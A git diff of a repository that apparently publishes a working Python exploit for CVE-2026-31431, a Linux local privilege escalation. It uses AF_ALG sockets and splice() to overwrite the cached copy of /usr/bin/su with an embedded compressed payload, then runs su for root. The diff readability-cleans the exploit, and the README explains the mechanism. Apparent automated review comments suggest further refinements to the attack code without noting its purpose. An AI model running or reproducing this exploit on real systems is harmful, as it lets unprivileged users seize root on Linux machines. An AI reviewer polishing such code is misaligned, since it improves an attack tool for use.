diff --git a/CVE-2026-31431/CVE-2026-31431.py b/CVE-2026-31431/CVE-2026-31431.py
index 0014ac1..ac5b51d 100644
--- a/CVE-2026-31431/CVE-2026-31431.py
+++ b/CVE-2026-31431/CVE-2026-31431.py
@@ -1,17 +1,17 @@
 import os, zlib, socket
-def exploit(zlib_payload, su_file, counter):
+def exploit(payload, su_file, counter):
-    listener = socket.socket(38, 5, 0)
+    listener = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET)
     listener.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
-    listener.setsockopt(279, 1, bytes.fromhex('0800010000000010'+'0'*64))
-    listener.setsockopt(279, 5, None, 4)
+    listener.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, bytes.fromhex('0800010000000010'+'0'*64))
+    listener.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE, None, 4)
     connection, _ = listener.accept()
-    connection.sendmsg([b"A"*4+zlib_payload], [(279, 3, b'\x00'*4), (279, 2, b'\x10'+b'\x00'*19), (279, 4, b'\x08' + b'\x00' * 3),], 32768)
+    connection.sendmsg([b"A"*4+payload], [(socket.SOL_ALG, 3, b'\x00'*4), (socket.SOL_ALG, 2, b'\x10'+b'\x00'*19), (socket.SOL_ALG, 4, b'\x08' + b'\x00' * 3),], 32768)
     stdin, stdout = os.pipe()
@@ -25,14 +25,14 @@ def exploit(zlib_payload, su_file, counter):
 if __name__ == "__main__":
-    zlib_payload = zlib.decompress(bytes.fromhex("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
+    payload = zlib.decompress(bytes.fromhex("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
     su_file = os.open("/usr/bin/su", 0)
     i = 0
-    while i < len(zlib_payload):
-        exploit(zlib_payload[i:i+4], su_file, i)
+    while i < len(payload):
+        exploit(payload[i:i+4], su_file, i)
         i += 4
     os.system("su")
diff --git a/CVE-2026-31431/README.md b/CVE-2026-31431/README.md
index 15319e0..f588483 100644
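Review bot: The sendmsg() call on the last changed line of the first hunk still carries the raw ancillary-message types 3, 2 and 4 next to socket.SOL_ALG, while every other bare integer in the hunk was replaced by its socket.* name, so the rename the commit sets out to do is incomplete; Python's socket module exposes these same values as `socket.ALG_SET_OP`, `socket.ALG_SET_IV` and `socket.ALG_SET_AEAD_ASSOCLEN`. The AF_ALG, SOL_ALG and ALG_* attributes are Linux-only and absent from other builds of the socket module, which is the portability cost the README hunk alludes to; a one-line comment above the socket.socket() call, `# Linux-only: socket.AF_ALG / SOL_ALG / ALG_* are undefined on other platforms`, would make that explicit at the point of use. The body of exploit() continues past the end of the hunk, so the lifetime of listener and connection cannot be reviewed here.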
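Review bot: The `i = 0` / `while i < len(payload):` / `i += 4` trio in the second hunk is the hand-rolled form of a stepped range; `for i in range(0, len(payload), 4):` with `exploit(payload[i:i+4], su_file, i)` as its body is the same iteration without the separately maintained counter, and the rename of zlib_payload to payload was the moment to make that change. This is a style point only; the visible behaviour is unchanged either way.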
--- a/CVE-2026-31431/README.md
+++ b/CVE-2026-31431/README.md
@@ -6,7 +6,9 @@ This exploit has caused quite the panic among defenders, so I re-wrote/unminifie
 In short, this exploit abuses the way `splice()` works and the AF_ALG socket type within [authencesn.c](https://github.com/torvalds/linux/blob/26fd6bff2c050196005312d1d306889220952a99/crypto/authencesn.c#L3) from the Linux crypto libraries. More or less, it allows the attacker to write 4 bytes of memory at a time to pagefiles, leading to the overwrite of the in-cache version of open files. When this is done with a SUID binary, like `/bin/su` the attacker is able to then execute the binary, which will pulls from the cache. This leaves the legit version of the overwritten binary in place while allowing arbitrary non-privileged users to gain root perms.
-*Note* - this version needs at least Python 3.10
+*Note* - This exploit needs at least Python 3.10
+
+*Additional Note* - For sake of readibility, I've replaced the direct int descriptors with their named socket.* versions, this may slightly reduce portability.
 # License